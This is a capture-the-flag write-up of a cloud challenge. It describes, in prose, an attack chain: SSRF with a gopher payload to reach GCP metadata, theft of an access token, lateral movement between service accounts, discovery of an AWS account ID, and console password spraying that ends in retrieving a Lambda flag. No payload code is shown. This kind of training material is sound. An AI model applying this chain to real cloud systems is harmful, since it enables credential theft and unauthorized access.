Infiltrate (open the gate)
Last updated
Was this helpful?
Last updated
Was this helpful?
When clicking the refresh, we can see that the web app sends a POST request with a local url as feed. This is a very classical SSRF vulenrability that we see in cloud CTF.
We are also able to get local file read by changing the protocol to file://
From the source code, we can see that there is blacklisting along with sanitization involved, so we are not able to get RCE. When attempting to query the metadata instances, I receive an error message that we are missing the request header metadata flavour.
However while doing research, I came accross this technique on payloadallthething, which uses the gopher protocol to embed a request header.
By copying the payload, we are able to list the SSH keys succesfully as a proof of concept.
Next, I enumerated the metadata and get the access token.
From here i was stuck for quite a while, trying to use the access token to enumerate the mp-compute2 service account permission. It was until I dm an admin for hint that I was able to progress.
So apparantly GCP Brute does not run the Test IAM Permissions on a different service account, and we have to manually enumerate via APIs.
The cloud source service account is from the enumeration we performed earlier.
Since the mp-compute2 is able to get access token for cloud-source, lets get the access token and enumerate cloud-source service account permission.
With the new access token, lets enumerate the service account permission.
From the output, we can see that the service account has permission over cloud source repository. Cloud source repository is basically Google cloud version of GitHub.
So lets enumerate the cloud source.
Enumerating cloud source repos.
Cloning the repo.
Looking at the code of cloned repo, it seems to just be a static HTML code. The only interesting part is that theres a public s3 bucket.
However, while enumerating the public bucket, all the files are standard libraries without anything interesting.
Thats when I recall a lab that I had done before, which is to extract the Account ID from a S3 bucket and do further enumeration with the Account ID.
I will not be elaborating on the process of setting up the IAM user and policy, you can refer to the lab that was linked, or find similar article wihtin the reference.
Here, I used s3-account-search to enumerate the Account ID, then used a curl request with the x-amz-expected-bucket-owner
to verify.
If the Account ID is wrong, we will get an access denied instead.
Next, Ill be spraying with GOAWSConsoleSpray again, with the username and password wordlist we saved previously. I managed to find a credential for haru with a reused password.
Lets enumerate recently visited service to see if theres anything interesting.
Looking at lambda, it looks like we have access over the function haru_test
Looking at the code source, we are able to retrieve the flag.
Utilize parthaban credentials on the web application to authenticate
Attack the web app with SSRF, using the gopher protocol to append the Metadata-Flavour
header
Use testIamPermission
on getAccessToken
against other service account to perform lateral movement
Lateral movement to cloud-source
service account
Enumerate Google Cloud Source and download the Repository
Utilize s3-account-search to retrieve AWS Account ID
Utilize GoAWSConsoleSpray to spray AWS Console with the newly retrieved Account ID
Retrieve the flag from AWS Lambda